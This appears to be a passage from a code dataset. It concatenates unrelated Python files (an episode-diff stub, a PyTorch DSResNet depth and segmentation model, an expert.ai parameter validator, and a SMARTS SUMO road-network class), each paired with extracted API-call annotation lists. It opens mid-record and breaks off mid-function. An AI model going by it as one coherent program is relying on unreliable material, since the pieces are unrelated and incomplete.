'msvcrt.getch', 'msvcrt.getch', ([], {}), '()\n', (3736, 3738), False, 'import msvcrt\n')]
|
from kha.episode import Episode
from kha.episode_patchers.episode_adder import EpisodeAdder
from kha.episode_patchers.episode_replacer import EpisodeReplacer
from kha.episode_patchers.noop_patcher import NoopPatcher
from kha.episode_patchers.patcher import Patcher
from kha.local_types import EventsDict, Uuid
def episode_diff(events_dict: EventsDict,
incoming_episode: Episode) -> Patcher:
return NoopPatcher()
|
[
"kha.episode_patchers.noop_patcher.NoopPatcher"
] |
[((421, 434), 'kha.episode_patchers.noop_patcher.NoopPatcher', 'NoopPatcher', ([], {}), '()\n', (432, 434), False, 'from kha.episode_patchers.noop_patcher import NoopPatcher\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from typing import Dict, Optional, Tuple
from .base_model import BaseModel
__all__ = ['DSResNet']
class DoubleConvBlock(BaseModel):
def __init__(self, in_channels: int, out_channels: int):
super(DoubleConvBlock, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(
in_channels, out_channels,
kernel_size=3, padding=1
),
nn.ReLU(),
nn.BatchNorm2d(out_channels),
)
self.conv2 = nn.Sequential(
nn.Conv2d(
out_channels, out_channels,
kernel_size=3, padding=1
),
nn.ReLU(),
nn.BatchNorm2d(out_channels),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.conv1(x)
out = self.conv2(out)
return out
class ResEncoderBlock(BaseModel):
def __init__(self, in_channels: int, out_channels: int):
super(ResEncoderBlock, self).__init__()
self.double_conv = DoubleConvBlock(
in_channels, out_channels
)
self.skip_conv = nn.Conv2d(
in_channels, out_channels, kernel_size=1
)
self.down = nn.MaxPool2d(2)
    def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
identity = self.skip_conv(x)
out = self.double_conv(x)
out = out + identity
return self.down(out), out
class ResDecoderBlock(BaseModel):
def __init__(self, in_channels: int, out_channels: int):
super(ResDecoderBlock, self).__init__()
self.transition_conv = nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1
)
)
self.enc_skip_conv = nn.Conv2d(
in_channels, out_channels, kernel_size=1
)
self.skip_conv = nn.Conv2d(
in_channels, out_channels, kernel_size=1
)
self.double_conv = DoubleConvBlock(
in_channels, out_channels
)
def forward(
self, x: torch.Tensor, encoder_input: torch.Tensor, skip_input: Optional[torch.Tensor] = None
) -> torch.Tensor:
# Transition
x = self.transition_conv(x)
x = F.interpolate(
x, scale_factor=2, mode='bilinear', align_corners=False
)
        if skip_input is not None:
encoder_input = torch.cat(
[encoder_input, skip_input], dim=1
)
encoder_input = self.enc_skip_conv(encoder_input)
x = torch.cat([x, encoder_input], dim=1)
# Decoding
identity = self.skip_conv(x)
out = self.double_conv(x)
out = out + identity
return out
class DSResNet(BaseModel):
"""A U-Net Inspired model for Monocular Depth Estimation and Image Segmentation.
For information check the `Depth-Estimation-Segmentation repository
<https://github.com/shan18/Depth-Estimation-Segmentation>`_.
`Note`: This model inherits the ``BaseModel`` class.
"""
def __init__(self):
super(DSResNet, self).__init__()
# Encoder Network
# ===============
# Preparation Block for bg
self.b1 = ResEncoderBlock(3, 16)
self.b2 = ResEncoderBlock(16, 32)
# Preparation Block for bg_fg
self.bf1 = ResEncoderBlock(3, 16)
self.bf2 = ResEncoderBlock(16, 32)
# Join both inputs
self.merge = nn.Conv2d(64, 32, kernel_size=1)
# Merged encoder network
self.enc1 = ResEncoderBlock(32, 64)
self.enc2 = ResEncoderBlock(64, 128)
self.enc3 = ResEncoderBlock(128, 256)
self.enc4 = ResEncoderBlock(256, 512)
# Decoder Network
# ===============
# Decoder Network - Segmentation
self.Mdec3 = ResDecoderBlock(512, 256)
self.Mdec2 = ResDecoderBlock(256, 128)
self.Mdec1 = ResDecoderBlock(128, 64)
self.M2 = ResDecoderBlock(64, 32)
self.M1 = ResDecoderBlock(32, 16)
self.M0 = nn.Conv2d(16, 1, kernel_size=1)
# Decoder Network - Depth
self.Ddec3 = ResDecoderBlock(512, 256)
self.Ddec2 = ResDecoderBlock(256, 128)
self.Ddec1 = ResDecoderBlock(128, 64)
self.D2 = ResDecoderBlock(64, 32)
self.D1 = ResDecoderBlock(32, 16)
self.D0 = nn.Conv2d(16, 1, kernel_size=1)
    def forward(self, x: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
# bg
b1_down, b1 = self.b1(x['bg'])
b2_down, b2 = self.b2(b1_down)
# bg_fg
bf1_down, bf1 = self.bf1(x['bg_fg'])
bf2_down, bf2 = self.bf2(bf1_down)
# Merging
merge = torch.cat([b2_down, bf2_down], dim=1)
merge = self.merge(merge)
# Merged Encoder
enc1_down, enc1 = self.enc1(merge)
enc2_down, enc2 = self.enc2(enc1_down)
enc3_down, enc3 = self.enc3(enc2_down)
_, enc4 = self.enc4(enc3_down)
# Decoder - Segmentation
Mdec3 = self.Mdec3(enc4, enc3)
Mdec2 = self.Mdec2(Mdec3, enc2)
Mdec1 = self.Mdec1(Mdec2, enc1)
m2 = self.M2(Mdec1, b2, bf2)
m1 = self.M1(m2, b1, bf1)
outM = self.M0(m1)
# Decoder - Depth
Ddec3 = self.Ddec3(enc4, enc3)
Ddec2 = self.Ddec2(Ddec3, enc2)
Ddec1 = self.Ddec1(Ddec2, enc1)
d2 = self.D2(Ddec1, b2, bf2)
d1 = self.D1(d2, b1, bf1)
outD = self.D0(d1)
return outD, outM
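# A minimal smoke-test sketch (kept as a comment because this module uses a
# relative import and is not meant to run as a script; the sizes below are
# assumptions — the spatial dims only need to be divisible by 32, since
# five MaxPool2d stages run before decoding):
#
#   model = DSResNet()
#   sample = {'bg': torch.randn(1, 3, 64, 64),
#             'bg_fg': torch.randn(1, 3, 64, 64)}
#   depth, mask = model(sample)
#   print(depth.shape, mask.shape)   # torch.Size([1, 1, 64, 64]) each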
|
[
"torch.nn.ReLU",
"torch.nn.Conv2d",
"torch.cat",
"torch.nn.BatchNorm2d",
"torch.nn.MaxPool2d",
"torch.nn.functional.interpolate"
] |
[((1167, 1218), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(1)'}), '(in_channels, out_channels, kernel_size=1)\n', (1176, 1218), True, 'import torch.nn as nn\n'), ((1261, 1276), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {}), '(2)\n', (1273, 1276), True, 'import torch.nn as nn\n'), ((1852, 1903), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(1)'}), '(in_channels, out_channels, kernel_size=1)\n', (1861, 1903), True, 'import torch.nn as nn\n'), ((1951, 2002), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(1)'}), '(in_channels, out_channels, kernel_size=1)\n', (1960, 2002), True, 'import torch.nn as nn\n'), ((2329, 2399), 'torch.nn.functional.interpolate', 'F.interpolate', (['x'], {'scale_factor': '(2)', 'mode': '"""bilinear"""', 'align_corners': '(False)'}), "(x, scale_factor=2, mode='bilinear', align_corners=False)\n", (2342, 2399), True, 'import torch.nn.functional as F\n'), ((2635, 2671), 'torch.cat', 'torch.cat', (['[x, encoder_input]'], {'dim': '(1)'}), '([x, encoder_input], dim=1)\n', (2644, 2671), False, 'import torch\n'), ((3540, 3572), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(32)'], {'kernel_size': '(1)'}), '(64, 32, kernel_size=1)\n', (3549, 3572), True, 'import torch.nn as nn\n'), ((4125, 4156), 'torch.nn.Conv2d', 'nn.Conv2d', (['(16)', '(1)'], {'kernel_size': '(1)'}), '(16, 1, kernel_size=1)\n', (4134, 4156), True, 'import torch.nn as nn\n'), ((4434, 4465), 'torch.nn.Conv2d', 'nn.Conv2d', (['(16)', '(1)'], {'kernel_size': '(1)'}), '(16, 1, kernel_size=1)\n', (4443, 4465), True, 'import torch.nn as nn\n'), ((4754, 4791), 'torch.cat', 'torch.cat', (['[b2_down, bf2_down]'], {'dim': '(1)'}), '([b2_down, bf2_down], dim=1)\n', (4763, 4791), False, 'import torch\n'), ((350, 412), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels, out_channels, kernel_size=3, padding=1)\n', (359, 412), True, 'import torch.nn as nn\n'), ((472, 481), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (479, 481), True, 'import torch.nn as nn\n'), ((495, 523), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (509, 523), True, 'import torch.nn as nn\n'), ((583, 646), 'torch.nn.Conv2d', 'nn.Conv2d', (['out_channels', 'out_channels'], {'kernel_size': '(3)', 'padding': '(1)'}), '(out_channels, out_channels, kernel_size=3, padding=1)\n', (592, 646), True, 'import torch.nn as nn\n'), ((706, 715), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (713, 715), True, 'import torch.nn as nn\n'), ((729, 757), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (743, 757), True, 'import torch.nn as nn\n'), ((1674, 1750), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': 'in_channels', 'out_channels': 'out_channels', 'kernel_size': '(1)'}), '(in_channels=in_channels, out_channels=out_channels, kernel_size=1)\n', (1683, 1750), True, 'import torch.nn as nn\n'), ((2485, 2530), 'torch.cat', 'torch.cat', (['[encoder_input, skip_input]'], {'dim': '(1)'}), '([encoder_input, skip_input], dim=1)\n', (2494, 2530), False, 'import torch\n')]
|
# Copyright (c) 2020 original authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from expertai.nlapi.v1 import constants
from expertai.nlapi.v1.errors import ParameterError
class ExpertAiValidation:
"""
    To be consistent, every new method added to verify a value should be
    named according to this pattern: [value_name]_value_is_correct
"""
def language_value_is_correct(self, language):
return language in constants.LANGUAGES.keys()
def resource_value_is_correct(self, resource):
return resource in constants.RESOURCES_NAMES
def check_name(self, param_name):
if param_name not in constants.PARAMETER_NAMES:
raise ParameterError("{} - invalid name".format(param_name))
def check_value(self, param_name, value):
method_name = "{}_value_is_correct".format(param_name)
method = getattr(self, method_name)
if not method(**{param_name: value}):
raise ParameterError(
"{} - invalid value: {}".format(param_name, value)
)
def check_parameters(self, params):
for p_name, p_value in params.items():
self.check_name(p_name)
self.check_value(p_name, p_value)
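# A hedged usage sketch (the accepted names and values depend on
# constants.PARAMETER_NAMES / LANGUAGES / RESOURCES_NAMES, which are not
# shown here; 'language' and 'resource' are inferred from the
# *_value_is_correct methods above):
#
#   validator = ExpertAiValidation()
#   validator.check_parameters({'language': 'en', 'resource': 'entities'})
#   # raises ParameterError for an unknown name or an out-of-range value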
|
[
"expertai.nlapi.v1.constants.LANGUAGES.keys"
] |
[((935, 961), 'expertai.nlapi.v1.constants.LANGUAGES.keys', 'constants.LANGUAGES.keys', ([], {}), '()\n', (959, 961), False, 'from expertai.nlapi.v1 import constants\n')]
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import random
from functools import lru_cache
from subprocess import check_output
from typing import List, Optional, Sequence, Set, Tuple
import numpy as np
import trimesh
import trimesh.scene
from cached_property import cached_property
from shapely.geometry import Point as shPoint
from shapely.geometry import Polygon
from shapely.ops import nearest_points, snap
from trimesh.exchange import gltf
from smarts.sstudio.types import MapSpec
from .coordinates import BoundingBox, Heading, Point, Pose, RefLinePoint
from .lanepoints import LanePoints, LinkedLanePoint
from .road_map import RoadMap, Waypoint
from .utils.geometry import buffered_shape, generate_mesh_from_polygons
from .utils.math import inplace_unwrap, radians_to_vec, vec_2d
from smarts.core.utils.sumo import sumolib # isort:skip
from sumolib.net.edge import Edge # isort:skip
def _convert_camera(camera):
result = {
"name": camera.name,
"type": "perspective",
"perspective": {
"aspectRatio": camera.fov[0] / camera.fov[1],
"yfov": np.radians(camera.fov[1]),
"znear": float(camera.z_near),
# HACK: The trimesh gltf export doesn't include a zfar which Panda3D GLB
# loader expects. Here we override to make loading possible.
"zfar": float(camera.z_near + 100),
},
}
return result
gltf._convert_camera = _convert_camera
class _GLBData:
def __init__(self, bytes_):
self._bytes = bytes_
def write_glb(self, output_path):
"""Generate a `.glb` geometry file."""
with open(output_path, "wb") as f:
f.write(self._bytes)
class SumoRoadNetwork(RoadMap):
"""A road network for a SUMO source."""
DEFAULT_LANE_WIDTH = 3.2
"""3.2 is the default Sumo road network lane width if it's not specified
explicitly in Sumo's NetEdit or the map.net.xml file.
This corresponds on a 1:1 scale to lanes 3.2m wide, which is typical
in North America (although US highway lanes are wider at ~3.7m)."""
def __init__(self, graph, net_file: str, map_spec: MapSpec):
self._log = logging.getLogger(self.__class__.__name__)
self._graph = graph
self._net_file = net_file
self._map_spec = map_spec
self._default_lane_width = SumoRoadNetwork._spec_lane_width(map_spec)
self._surfaces = {}
self._lanes = {}
self._roads = {}
self._waypoints_cache = SumoRoadNetwork._WaypointsCache()
self._lanepoints = None
if map_spec.lanepoint_spacing is not None:
assert map_spec.lanepoint_spacing > 0
# XXX: this should be last here since LanePoints() calls road_network methods immediately
self._lanepoints = LanePoints.from_sumo(
self, spacing=map_spec.lanepoint_spacing
)
@staticmethod
def _check_net_origin(bbox):
assert len(bbox) == 4
return bbox[0] <= 0.0 and bbox[1] <= 0.0 and bbox[2] >= 0.0 and bbox[3] >= 0.0
shifted_net_file_name = "shifted_map-AUTOGEN.net.xml"
@classmethod
def shifted_net_file_path(cls, net_file_path):
"""The path of the modified map file after coordinate normalization."""
net_file_folder = os.path.dirname(net_file_path)
return os.path.join(net_file_folder, cls.shifted_net_file_name)
@classmethod
@lru_cache(maxsize=1)
def _shift_coordinates(cls, net_file_path, shifted_path):
assert shifted_path != net_file_path
logger = logging.getLogger(cls.__name__)
logger.info(f"normalizing net coordinates into {shifted_path}...")
## Translate the map's origin to remove huge (imprecise) offsets.
## See https://sumo.dlr.de/docs/netconvert.html#usage_description
## for netconvert options description.
try:
stdout = check_output(
[
"netconvert",
"--offset.disable-normalization=FALSE",
"-s",
net_file_path,
"-o",
shifted_path,
]
)
logger.debug(f"netconvert output: {stdout}")
return True
except Exception as e:
logger.warning(
f"unable to use netconvert tool to normalize coordinates: {e}"
)
return False
@classmethod
def from_spec(cls, map_spec: MapSpec):
"""Generate a road network from the given map specification."""
net_file = SumoRoadNetwork._map_path(map_spec)
# Connections to internal lanes are implicit. If `withInternal=True` is
# set internal junctions and the connections from internal lanes are
# loaded into the network graph.
G = sumolib.net.readNet(net_file, withInternal=True)
if not cls._check_net_origin(G.getBoundary()):
shifted_net_file = cls.shifted_net_file_path(net_file)
if os.path.isfile(shifted_net_file) or (
map_spec.shift_to_origin
and cls._shift_coordinates(net_file, shifted_net_file)
):
G = sumolib.net.readNet(shifted_net_file, withInternal=True)
assert cls._check_net_origin(G.getBoundary())
net_file = shifted_net_file
# keep track of having shifted the graph by
# injecting state into the network graph.
# this is needed because some maps have been pre-shifted,
# and will already have a locationOffset, but for those
# the offset should not be used (because all their other
# coordinates are relative to the origin).
G._shifted_by_smarts = True
return cls(G, net_file, map_spec)
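    # A hedged construction sketch (the MapSpec fields shown are the ones
    # this class reads; the map path itself is an assumption):
    #
    #   spec = MapSpec(source="scenarios/loop/map.net.xml",
    #                  lanepoint_spacing=1.0)
    #   road_map = SumoRoadNetwork.from_spec(spec)
    #   road_map.to_glb("map.glb")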
@property
def source(self) -> str:
"""This is the net.xml file that corresponds with our possibly-offset coordinates."""
return self._net_file
@staticmethod
def _spec_lane_width(map_spec: MapSpec) -> float:
return (
map_spec.default_lane_width
if map_spec.default_lane_width is not None
else SumoRoadNetwork.DEFAULT_LANE_WIDTH
)
@staticmethod
def _map_path(map_spec: MapSpec) -> str:
if os.path.isdir(map_spec.source):
# map.net.xml is the default Sumo map name; try that:
return os.path.join(map_spec.source, "map.net.xml")
return map_spec.source
def is_same_map(self, map_spec: MapSpec) -> bool:
"""Test if the road network is identical to the given map specification."""
return (
(
map_spec.source == self._map_spec.source
or SumoRoadNetwork._map_path(map_spec)
== SumoRoadNetwork._map_path(self._map_spec)
)
and map_spec.lanepoint_spacing == self._map_spec.lanepoint_spacing
and (
map_spec.default_lane_width == self._map_spec.default_lane_width
or SumoRoadNetwork._spec_lane_width(map_spec)
== SumoRoadNetwork._spec_lane_width(self._map_spec)
)
and (
map_spec.shift_to_origin == self._map_spec.shift_to_origin
or (not map_spec.shift_to_origin and not self._graph._shifted_by_smarts)
)
)
@cached_property
def bounding_box(self) -> BoundingBox:
"""Get the minimal axis aligned bounding box that contains all map geometry."""
# maps are assumed to start at the origin
bb = self._graph.getBoundary() # 2D bbox in format (xmin, ymin, xmax, ymax)
return BoundingBox(
min_pt=Point(x=bb[0], y=bb[1]), max_pt=Point(x=bb[2], y=bb[3])
)
@property
def scale_factor(self) -> float:
"""Get the scale factor between the default lane width and the default lane width."""
# map units per meter
return self._default_lane_width / SumoRoadNetwork.DEFAULT_LANE_WIDTH
def to_glb(self, at_path):
"""Build a glb file for camera rendering and envision"""
polys = self._compute_road_polygons()
glb = self._make_glb_from_polys(polys)
glb.write_glb(at_path)
class Surface(RoadMap.Surface):
"""Describes a surface."""
def __init__(self, surface_id: str, road_map):
self._surface_id = surface_id
self._map = road_map
@property
def surface_id(self) -> str:
"""The identifier for this surface."""
return self._surface_id
@property
def is_drivable(self) -> bool:
"""If it is possible to drive on this surface."""
# all surfaces on Sumo road networks are drivable
return True
def surface_by_id(self, surface_id: str) -> RoadMap.Surface:
"""Find a surface by its identifier."""
return self._surfaces.get(surface_id)
class Lane(RoadMap.Lane, Surface):
"""Describes a lane."""
def __init__(self, lane_id: str, sumo_lane, road_map):
super().__init__(lane_id, road_map)
self._lane_id = lane_id
self._sumo_lane = sumo_lane
self._road = road_map.road_by_id(sumo_lane.getEdge().getID())
assert self._road
@property
def lane_id(self) -> str:
return self._lane_id
@property
def road(self) -> RoadMap.Road:
return self._road
@cached_property
def speed_limit(self) -> float:
return self._sumo_lane.getSpeed()
@cached_property
def length(self) -> float:
return self._sumo_lane.getLength()
@cached_property
def _width(self) -> float:
return self._sumo_lane.getWidth()
@property
def in_junction(self) -> bool:
"""If this lane is part of a junction/intersection."""
return self._road.is_junction
@cached_property
def index(self) -> int:
"""The index of this lane within the road it is part of."""
return self._sumo_lane.getIndex()
@cached_property
def lanes_in_same_direction(self) -> List[RoadMap.Lane]:
"""Find nearby lanes heading in the same direction as this lane."""
if not self.in_junction:
# When not in an intersection, all SUMO Lanes for an Edge go in the same direction.
return [l for l in self.road.lanes if l != self]
result = []
in_roads = set(il.road for il in self.incoming_lanes)
out_roads = set(il.road for il in self.outgoing_lanes)
for lane in self.road.lanes:
if self == lane:
continue
other_in_roads = set(il.road for il in lane.incoming_lanes)
if in_roads & other_in_roads:
other_out_roads = set(il.road for il in self.outgoing_lanes)
if out_roads & other_out_roads:
result.append(lane)
return result
@cached_property
def lane_to_left(self) -> Tuple[RoadMap.Lane, bool]:
"""Get the lane to the left of this lane assuming right hand driving."""
result = None
for other in self.lanes_in_same_direction:
if other.index > self.index and (
not result or other.index < result.index
):
result = other
return result, True
@cached_property
def lane_to_right(self) -> Tuple[RoadMap.Lane, bool]:
"""Get the lane to the right of this lane assuming right hand driving."""
result = None
for other in self.lanes_in_same_direction:
if other.index < self.index and (
not result or other.index > result.index
):
result = other
return result, True
@cached_property
def incoming_lanes(self) -> List[RoadMap.Lane]:
"""Lanes leading into this lane."""
return [
self._map.lane_by_id(incoming.getID())
for incoming in self._sumo_lane.getIncoming()
]
@cached_property
def outgoing_lanes(self) -> List[RoadMap.Lane]:
"""Lanes leading out of this lane."""
return [
self._map.lane_by_id(
outgoing.getViaLaneID() or outgoing.getToLane().getID()
)
for outgoing in self._sumo_lane.getOutgoing()
]
@cached_property
def entry_surfaces(self) -> List[RoadMap.Surface]:
"""All surfaces leading into this lane."""
return self.incoming_lanes
@cached_property
def exit_surfaces(self) -> List[RoadMap.Surface]:
"""All surfaces leading out of this lane."""
return self.outgoing_lanes
@lru_cache(maxsize=16)
def oncoming_lanes_at_offset(self, offset: float) -> List[RoadMap.Lane]:
"""Adjacent lanes travelling in the opposite direction to this lane."""
result = []
radius = 1.1 * self.width_at_offset(offset)
pt = self.from_lane_coord(RefLinePoint(offset))
nearby_lanes = self._map.nearest_lanes(pt, radius=radius)
if not nearby_lanes:
return result
my_vect = self.vector_at_offset(offset)
my_norm = np.linalg.norm(my_vect)
if my_norm == 0:
return result
threshold = -0.995562 # cos(175*pi/180)
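            # For unit vectors u and v, dot(u, v) equals the cosine of the
            # angle between them; the division below normalizes the raw dot
            # product, so lane_angle < threshold means the two lanes point in
            # nearly opposite directions (an angle wider than ~175 degrees).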
for lane, _ in nearby_lanes:
if lane == self:
continue
lane_refline_pt = lane.to_lane_coord(pt)
lv = lane.vector_at_offset(lane_refline_pt.s)
lv_norm = np.linalg.norm(lv)
if lv_norm == 0:
continue
lane_angle = np.dot(my_vect, lv) / (my_norm * lv_norm)
if lane_angle < threshold:
result.append(lane)
return result
@cached_property
def foes(self) -> List[RoadMap.Lane]:
"""Lanes that cross over this lane (useful in junctions.)"""
# TODO: we might do better here since Sumo/Traci determines right-of-way for their connections/links. See:
# https://sumo.dlr.de/pydoc/traci._lane.html#LaneDomain-getFoes
result = [
incoming
for outgoing in self.outgoing_lanes
for incoming in outgoing.incoming_lanes
if incoming != self
]
if self.in_junction:
in_roads = set(il.road for il in self.incoming_lanes)
for foe in self.road.lanes:
foe_in_roads = set(il.road for il in foe.incoming_lanes)
if not bool(in_roads & foe_in_roads):
result.append(foe)
return list(set(result))
def waypoint_paths_for_pose(
self, pose: Pose, lookahead: int, route: RoadMap.Route = None
) -> List[List[Waypoint]]:
road_ids = [road.road_id for road in route.roads] if route else None
return self._waypoint_paths_at(pose.position, lookahead, road_ids)
def waypoint_paths_at_offset(
self, offset: float, lookahead: int = 30, route: RoadMap.Route = None
) -> List[List[Waypoint]]:
wp_start = self.from_lane_coord(RefLinePoint(offset))
road_ids = [road.road_id for road in route.roads] if route else None
return self._waypoint_paths_at(wp_start, lookahead, road_ids)
def _waypoint_paths_at(
self,
point: Sequence,
lookahead: int,
filter_road_ids: Optional[Sequence[str]] = None,
) -> List[List[Waypoint]]:
"""Waypoints on this lane leading on from the given point."""
closest_linked_lp = (
self._map._lanepoints.closest_linked_lanepoint_on_lane_to_point(
point, self._lane_id
)
)
return self._map._waypoints_starting_at_lanepoint(
closest_linked_lp,
lookahead,
tuple(filter_road_ids) if filter_road_ids else (),
tuple(point),
)
@lru_cache(maxsize=4)
def shape(
self, buffer_width: float = 0.0, default_width: Optional[float] = None
) -> Polygon:
"""The lane geometry as a shape."""
new_width = buffer_width
if default_width:
new_width += default_width
else:
new_width += self._width
            assert new_width >= 0.0
if new_width > 0:
return buffered_shape(self._sumo_lane.getShape(), new_width)
line = self._sumo_lane.getShape()
bline = buffered_shape(line, 0.0)
return line if bline.is_empty else bline
@lru_cache(maxsize=8)
def contains_point(self, point: Point) -> bool:
"""If the given point is within this lane."""
# TAI: could use (cached) self._sumo_lane.getBoundingBox(...) as a quick first-pass check...
lane_point = self.to_lane_coord(point)
return (
abs(lane_point.t) <= self._width / 2 and 0 <= lane_point.s < self.length
)
@lru_cache(maxsize=8)
def offset_along_lane(self, world_point: Point) -> float:
shape = self._sumo_lane.getShape(False)
point = world_point[:2]
if point not in shape:
return sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint(
point, shape, perpendicular=False
)
# SUMO geomhelper.polygonOffset asserts when the point is part of the shape.
# We get around the assertion with a check if the point is part of the shape.
offset = 0
for i in range(len(shape) - 1):
if shape[i] == point:
break
offset += sumolib.geomhelper.distance(shape[i], shape[i + 1])
return offset
def width_at_offset(self, offset: float) -> float:
return self._width
@lru_cache(maxsize=8)
def project_along(
self, start_offset: float, distance: float
) -> Set[Tuple[RoadMap.Lane, float]]:
return super().project_along(start_offset, distance)
@lru_cache(maxsize=8)
def from_lane_coord(self, lane_point: RefLinePoint) -> Point:
shape = self._sumo_lane.getShape(False)
x, y = sumolib.geomhelper.positionAtShapeOffset(shape, lane_point.s)
return Point(x=x, y=y)
@lru_cache(maxsize=8)
def to_lane_coord(self, world_point: Point) -> RefLinePoint:
return super().to_lane_coord(world_point)
@lru_cache(maxsize=8)
def center_at_point(self, point: Point) -> Point:
return super().center_at_point(point)
@lru_cache(8)
def edges_at_point(self, point: Point) -> Tuple[Point, Point]:
return super().edges_at_point(point)
@lru_cache(8)
def vector_at_offset(self, start_offset: float) -> np.ndarray:
return super().vector_at_offset(start_offset)
@lru_cache(maxsize=8)
def center_pose_at_point(self, point: Point) -> Pose:
return super().center_pose_at_point(point)
@lru_cache(maxsize=8)
def curvature_radius_at_offset(
self, offset: float, lookahead: int = 5
) -> float:
return super().curvature_radius_at_offset(offset, lookahead)
def lane_by_id(self, lane_id: str) -> RoadMap.Lane:
lane = self._lanes.get(lane_id)
if lane:
return lane
sumo_lane = self._graph.getLane(lane_id)
if not sumo_lane:
self._log.warning(
f"SumoRoadNetwork got request for unknown lane_id '{lane_id}'"
)
return None
lane = SumoRoadNetwork.Lane(lane_id, sumo_lane, self)
self._lanes[lane_id] = lane
assert lane_id not in self._surfaces
self._surfaces[lane_id] = lane
return lane
class Road(RoadMap.Road, Surface):
"""This is akin to a 'road segment' in real life.
Many of these might correspond to a single named road in reality."""
def __init__(self, road_id: str, sumo_edge: Edge, road_map):
super().__init__(road_id, road_map)
self._road_id = road_id
self._sumo_edge = sumo_edge
@cached_property
def is_junction(self) -> bool:
return self._sumo_edge.isSpecial()
@cached_property
def length(self) -> float:
return self._sumo_edge.getLength()
@property
def road_id(self) -> str:
return self._road_id
@cached_property
def incoming_roads(self) -> List[RoadMap.Road]:
return [
self._map.road_by_id(edge.getID())
for edge in self._sumo_edge.getIncoming().keys()
]
@cached_property
def outgoing_roads(self) -> List[RoadMap.Road]:
return [
self._map.road_by_id(edge.getID())
for edge in self._sumo_edge.getOutgoing().keys()
]
@cached_property
def entry_surfaces(self) -> List[RoadMap.Surface]:
# TAI: also include lanes here?
return self.incoming_roads
@cached_property
def exit_surfaces(self) -> List[RoadMap.Surface]:
# TAI: also include lanes here?
return self.outgoing_roads
@lru_cache(maxsize=16)
def oncoming_roads_at_point(self, point: Point) -> List[RoadMap.Road]:
result = []
for lane in self.lanes:
offset = lane.to_lane_coord(point).s
result += [
ol.road
for ol in lane.oncoming_lanes_at_offset(offset)
if ol.road != self
]
return result
@cached_property
def parallel_roads(self) -> List[RoadMap.Road]:
from_node, to_node = (
self._sumo_edge.getFromNode(),
self._sumo_edge.getToNode(),
)
return [
self._map.road_by_id(edge.getID())
for edge in from_node.getOutgoing()
if self.road_id != edge.getID()
and edge.getToNode().getID() == to_node.getID()
]
@cached_property
def lanes(self) -> List[RoadMap.Lane]:
return [
self._map.lane_by_id(sumo_lane.getID())
for sumo_lane in self._sumo_edge.getLanes()
]
def lane_at_index(self, index: int) -> RoadMap.Lane:
return self.lanes[index]
@lru_cache(maxsize=8)
def contains_point(self, point: Point) -> bool:
# TAI: could use (cached) self._sumo_edge.getBoundingBox(...) as a quick first-pass check...
for lane in self.lanes:
if lane.contains_point(point):
return True
return False
@lru_cache(maxsize=8)
def edges_at_point(self, point: Point) -> Tuple[Point, Point]:
lanes = self.lanes
_, right_edge = lanes[0].edges_at_point(point)
left_edge, _ = lanes[-1].edges_at_point(point)
return left_edge, right_edge
@lru_cache(maxsize=4)
def shape(
self, buffer_width: float = 0.0, default_width: Optional[float] = None
) -> Polygon:
new_width = buffer_width
if default_width:
new_width += default_width
assert new_width >= 0.0
if new_width > 0:
return buffered_shape(self._sumo_edge.getShape(), new_width)
line = self._sumo_edge.getShape()
bline = buffered_shape(line, 0.0)
return line if bline.is_empty else bline
def road_by_id(self, road_id: str) -> RoadMap.Road:
road = self._roads.get(road_id)
if road:
return road
sumo_edge = self._graph.getEdge(road_id)
if not sumo_edge:
self._log.warning(
f"SumoRoadNetwork got request for unknown road_id '{road_id}'"
)
return None
road = SumoRoadNetwork.Road(road_id, sumo_edge, self)
self._roads[road_id] = road
assert road_id not in self._surfaces
self._surfaces[road_id] = road
return road
@lru_cache(maxsize=16)
def nearest_lanes(
self, point: Point, radius: Optional[float] = None, include_junctions=True
